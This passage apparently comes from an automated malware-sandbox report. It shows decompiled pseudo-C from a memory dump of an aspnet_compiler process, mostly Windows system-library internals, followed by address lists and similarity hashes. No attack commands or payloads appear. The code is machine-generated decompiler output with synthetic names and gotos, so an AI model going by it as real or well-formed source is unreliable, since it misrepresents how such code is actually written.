												_t173 = L01264620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0128F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0128F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E012452A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0125EB70(1, 0x13379a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0125AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E012895D0();
																			L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0128B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01283D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0128B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x01264128
0x01264135
0x0126413c
0x01264141
0x01264145
0x01264147
0x0126414e
0x01264151
0x01264159
0x0126415c
0x01264160
0x01264164
0x01264168
0x0126416c
0x0126417f
0x01264181
0x0126446a
0x0126446a
0x0126418c
0x01264195
0x01264199
0x01264432
0x01264439
0x0126443d
0x01264442
0x01264447
0x00000000
0x0126419f
0x012641a3
0x012641b1
0x012641b9
0x012641bd
0x012645db
0x012645db
0x00000000
0x012641c3
0x012641c3
0x012641ce
0x012641d4
0x012ae138
0x012ae13e
0x012ae169
0x012ae16d
0x012ae19e
0x012ae16f
0x012ae16f
0x012ae175
0x012ae179
0x012ae18f
0x012ae193
0x00000000
0x012ae199
0x00000000
0x012ae199
0x012ae193
0x00000000
0x00000000
0x00000000
0x012641da
0x012641da
0x012641df
0x012641e4
0x012641ec
0x01264203
0x01264207
0x012ae1fd
0x01264222
0x01264226
0x012ae1f3
0x012ae1f3
0x0126422c
0x0126422c
0x01264233
0x012ae1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01264239
0x01264239
0x01264239
0x01264239
0x01264233
0x01264226
0x012641ee
0x012641ee
0x012641f4
0x01264575
0x012ae1b1
0x012ae1b1
0x00000000
0x0126457b
0x0126457b
0x01264582
0x012ae1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x01264588
0x01264588
0x0126458c
0x012ae1c4
0x012ae1c4
0x00000000
0x01264592
0x01264592
0x01264599
0x012ae1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0126459f
0x0126459f
0x012645a3
0x012ae1d7
0x012ae1e4
0x00000000
0x012645a9
0x012645a9
0x012645b0
0x012ae1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x012645b6
0x012645b6
0x012645b6
0x00000000
0x012645b6
0x012645b0
0x012645a3
0x01264599
0x0126458c
0x01264582
0x00000000
0x00000000
0x00000000
0x00000000
0x012641f4
0x0126423e
0x01264241
0x012645c0
0x012645c4
0x00000000
0x012645ca
0x012645ca
0x00000000
0x012ae207
0x012ae20f
0x00000000
0x00000000
0x00000000
0x00000000
0x012645d1
0x00000000
0x00000000
0x012645ca
0x00000000
0x01264247
0x01264247
0x01264247
0x01264249
0x01264249
0x01264249
0x01264251
0x01264251
0x01264257
0x0126425f
0x0126426e
0x01264270
0x0126427a
0x012ae219
0x012ae219
0x01264280
0x01264282
0x01264456
0x012645ea
0x00000000
0x012645f0
0x012ae223
0x00000000
0x012ae223
0x0126445c
0x0126445c
0x00000000
0x0126445c
0x00000000
0x01264288
0x0126428c
0x012ae298
0x01264292
0x01264292
0x0126429e
0x012642a3
0x012642a7
0x012642ac
0x012ae22d
0x012642b2
0x012642b2
0x012642b9
0x012642bc
0x012642c2
0x012642ca
0x012642cd
0x012642cd
0x012642d4
0x0126433f
0x0126433f
0x012642d6
0x012642d6
0x012642d9
0x012642dd
0x012642eb
0x012ae23a
0x012642f1
0x01264305
0x0126430d
0x01264315
0x01264318
0x0126431f
0x01264322
0x0126432e
0x0126433b
0x0126433b
0x00000000
0x0126432e
0x012642eb
0x0126434c
0x0126434e
0x01264352
0x01264359
0x0126435e
0x01264361
0x0126436e
0x0126438a
0x0126438e
0x01264396
0x0126439e
0x012643a1
0x012643ad
0x012643bb
0x012643bb
0x012643ad
0x0126436e
0x012643bf
0x012643c5
0x01264463
0x01264463
0x012643ce
0x012643d5
0x012643d9
0x012643df
0x01264475
0x01264479
0x01264491
0x01264491
0x01264479
0x012643e5
0x012643eb
0x012643f4
0x012643f6
0x012643f9
0x012643fc
0x012643ff
0x012644e8
0x012644ed
0x012644f3
0x012ae247
0x00000000
0x012644f9
0x01264504
0x01264508
0x0126450f
0x012ae269
0x00000000
0x01264515
0x01264519
0x01264531
0x01264534
0x01264537
0x0126453e
0x01264541
0x0126454a
0x012ae255
0x012ae255
0x012ae25b
0x012ae25e
0x012ae261
0x012ae261
0x01264555
0x01264559
0x0126455d
0x012ae26d
0x012ae270
0x012ae274
0x012ae27a
0x012ae27d
0x012ae28e
0x012ae28e
0x01264563
0x01264563
0x01264569
0x01264569
0x00000000
0x0126455d
0x0126450f
0x00000000
0x012644f3
0x012643ff
0x01264405
0x01264405
0x01264405
0x012642ac
0x0126428c
0x01264282
0x01264407
0x0126440d
0x012ae2af
0x012ae2af
0x01264413
0x01264413
0x00000000
0x012641d4
0x00000000
0x012641c3
0x012641bd
0x01264415
0x01264415
0x01264416
0x01264417
0x01264429
0x0126416e
0x0126416e
0x01264175
0x01264498
0x0126449f
0x012ae12d
0x00000000
0x012ae133
0x00000000
0x012ae133
0x012644a5
0x012644a5
0x012644aa
0x00000000
0x012644bb
0x012644ca
0x012644d6
0x012644d7
0x012644d8
0x012644e3
0x012644e3
0x012644aa
0x0126417b
0x0126417b
0x0126417b
0x00000000
0x0126417b
0x01264175
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ceaef860572daec8b79ad0babcec707f7101198484d7963a52dabf5fe1dd33
Instruction ID: 305e996360f9a7673bb3015be378b246573d6c2f7b4a4157fb3cf7b906c1dd17
Opcode Fuzzy Hash: d0ceaef860572daec8b79ad0babcec707f7101198484d7963a52dabf5fe1dd33
Instruction Fuzzy Hash: 2CF1AF706282928FC724EF18C481A3AB7E5FF98714F55492EF6C6CB290E774D891CB52

Uniqueness

Uniqueness Score: -1.00%

Function 012720A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E012720A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1338714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01272EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01272EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E012458EC(_t240);
									_t221 =  *0x1335cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1335cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01284A2C(0x1336e40, 0x1284b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01267D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1225c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0127F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0127F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E012C7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01262400(_t267 + 0x20);
															}
															L01262400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01272397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01262280(_t134, 0x1338608);
									__eflags =  *0x1336e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0125FFB0(_t198, _t241, 0x1338608);
										__eflags = _t253;
										if(_t253 != 0) {
											L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1336e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1338608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01276B90(_t210,  &_v64);
										_t262 =  *0x1338608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0127E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E012897C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0128006A(0x1338608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1338608);
												E0128B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1336904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1336e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0125FFB0(_t198, _t240, 0x1338608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E012800C2(0x1338608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x012720a0
0x012720a8
0x012720ad
0x012720b3
0x012720b8
0x012720c2
0x012720c7
0x012720cb
0x012720d2
0x01272263
0x01272266
0x012b5836
0x012b5836
0x00000000
0x0127226c
0x0127226c
0x01272270
0x01272274
0x012720e2
0x012720e2
0x012720e6
0x012720ee
0x012b57dc
0x012b57de
0x012b57ec
0x012b57ec
0x012b57f1
0x012b57f3
0x012b57f8
0x00000000
0x012b57f8
0x012b57e0
0x012b57e4
0x012b57ea
0x00000000
0x00000000
0x00000000
0x012b57ea
0x012720f4
0x012720f4
0x012720f8
0x012720f8
0x012720fc
0x01272100
0x01272106
0x01272201
0x01272206
0x0127220b
0x0127220e
0x012722a9
0x012722ac
0x00000000
0x00000000
0x012722b2
0x012722b5
0x012b5801
0x012b5806
0x00000000
0x00000000
0x012b5810
0x012b5815
0x012b5818
0x00000000
0x00000000
0x012b581e
0x012722bb
0x012722bb
0x01272218
0x01272218
0x0127221c
0x01272220
0x01272222
0x012722c2
0x012722c4
0x012722dc
0x012722dc
0x012722e1
0x00000000
0x00000000
0x00000000
0x012722e7
0x012722c8
0x012722cd
0x012722d3
0x012722d6
0x012b5823
0x012b5825
0x012b5827
0x00000000
0x00000000
0x012b582d
0x00000000
0x012b582d
0x00000000
0x01272228
0x01272228
0x00000000
0x01272228
0x01272222
0x01272214
0x01272214
0x00000000
0x01272114
0x01272114
0x01272114
0x0127211a
0x0127211c
0x01272348
0x0127234d
0x012b5840
0x012b5845
0x012b5848
0x012b584e
0x012b584e
0x012b5848
0x01272353
0x01272355
0x01272388
0x01272388
0x01272368
0x0127236a
0x0127236c
0x0127238f
0x00000000
0x0127236e
0x0127236e
0x0127218e
0x0127218e
0x01272191
0x01272195
0x012b5a03
0x012b5a06
0x012b5a0c
0x012b5a0f
0x012b5a11
0x012b5a13
0x012b5a13
0x012b5a19
0x012b5a1f
0x00000000
0x0127219b
0x0127219b
0x012721a0
0x01272282
0x01272284
0x01272284
0x01272284
0x01272284
0x012721a6
0x012721a9
0x012721ac
0x012721ae
0x012721b3
0x0127228b
0x01272290
0x01272379
0x01272296
0x01272298
0x01272298
0x01272290
0x012721b9
0x012721be
0x012722a2
0x012722a2
0x012721c4
0x012721c8
0x012721cc
0x012721d0
0x012721d4
0x012721de
0x012721e3
0x012b5a29
0x012b5a2c
0x00000000
0x00000000
0x012b5a3b
0x00000000
0x012721e9
0x012721e9
0x012721e9
0x012721ee
0x012721f1
0x012b5a45
0x012b5a4b
0x012b5a52
0x012b5a58
0x012b5a5d
0x012b5a5f
0x012b5a71
0x012b5a61
0x012b5a6a
0x012b5a6a
0x012b5a76
0x012b5a79
0x012b5a7f
0x012b5a83
0x012b5a85
0x012b5a87
0x012b5a87
0x012b5a8c
0x012b5a91
0x012b5a97
0x012b5a9f
0x012b5aa0
0x012b5aa1
0x012b5aa6
0x012b5aab
0x012b5ab1
0x012b5ab3
0x012b5ab9
0x012b5aca
0x012b5ad4
0x012b5ad4
0x012b5ade
0x012b5ade
0x012b5aab
0x012b5a79
0x012b5a52
0x012721f7
0x012721f9
0x012721fe
0x012721fe
0x012721e3
0x01272195
0x0127236c
0x01272122
0x01272122
0x01272124
0x01272231
0x01272236
0x01272236
0x01272238
0x01272238
0x01272240
0x01272242
0x01272244
0x012b59fc
0x0127218c
0x0127218c
0x00000000
0x0127218c
0x0127224a
0x0127224f
0x01272256
0x01272304
0x01272309
0x0127230f
0x0127231e
0x0127231e
0x0127231e
0x01272320
0x01272325
0x0127232a
0x0127232c
0x0127233e
0x0127233e
0x00000000
0x0127232c
0x01272311
0x01272317
0x0127231a
0x0127231c
0x01272380
0x01272380
0x01272380
0x01272384
0x00000000
0x00000000
0x01272386
0x00000000
0x0127231c
0x0127225c
0x0127225c
0x00000000
0x0127225c
0x0127212a
0x01272134
0x01272138
0x0127213d
0x012b5858
0x012b5863
0x012b5863
0x012b5867
0x012b586a
0x00000000
0x00000000
0x012b586c
0x012b586c
0x012b5871
0x012b5875
0x012b5877
0x012b5997
0x012b599c
0x012b59a1
0x012b59a7
0x012b59a7
0x00000000
0x012b59a7
0x012b587d
0x00000000
0x012b588b
0x012b588b
0x012b5890
0x012b5892
0x012b5894
0x012b5899
0x012b589b
0x012b58a0
0x012b58a0
0x012b58aa
0x012b58b2
0x012b58b6
0x012b58be
0x012b58c6
0x012b58c9
0x012b590d
0x012b5917
0x012b591a
0x012b591c
0x012b5920
0x012b5928
0x012b592a
0x012b592c
0x012b592e
0x012b592e
0x012b58cb
0x012b58cd
0x012b58d8
0x012b58e0
0x012b58f4
0x012b58fe
0x012b58fe
0x012b593a
0x012b593e
0x012b5940
0x012b5942
0x00000000
0x012b5944
0x012b5944
0x012b5949
0x012b594e
0x012b594e
0x012b5953
0x012b595b
0x012b5976
0x012b5976
0x012b597a
0x012b597f
0x00000000
0x00000000
0x00000000
0x00000000
0x012b5981
0x012b5981
0x012b5981
0x012b5983
0x012b5988
0x012b598d
0x012b5991
0x012b5991
0x00000000
0x012b595d
0x012b595d
0x012b5963
0x012b5965
0x00000000
0x00000000
0x00000000
0x00000000
0x012b5967
0x012b5967
0x012b596b
0x012b596d
0x00000000
0x00000000
0x012b596f
0x012b5971
0x012b5971
0x012b5974
0x00000000
0x00000000
0x00000000
0x012b5974
0x00000000
0x012b5967
0x012b595b
0x012b5942
0x012b5863
0x01272143
0x01272143
0x01272149
0x0127214f
0x012722f1
0x012722f6
0x00000000
0x01272173
0x01272173
0x0127217d
0x01272181
0x01272186
0x012b59ae
0x012b59b2
0x012b59b5
0x012b59b7
0x012b59ba
0x012b59cd
0x012b59d1
0x012b59d5
0x012b59d9
0x012b59db
0x00000000
0x00000000
0x012b59dd
0x012b59dd
0x012b59e1
0x012b59e4
0x012b59e7
0x012b59ee
0x012b59ee
0x012b59f3
0x012b59f3
0x00000000
0x01272186
0x0127214f
0x01272106
0x01272266
0x012720d8
0x012720da
0x012720e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d18dffeb1c7cc2483ffb43c31a50460c543b2c2d59a22e8ed47fdb7b4e2075c8
Instruction ID: 9349a889ce2cc2482b05622dcfd5784954a7d206550dd1e11b1d018f1795fa46
Opcode Fuzzy Hash: d18dffeb1c7cc2483ffb43c31a50460c543b2c2d59a22e8ed47fdb7b4e2075c8
Instruction Fuzzy Hash: 40F12270A28342DFE726CF2CC88176B7BE5BF85364F08851DEA959B281D774D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0125D5E0 Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0125D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
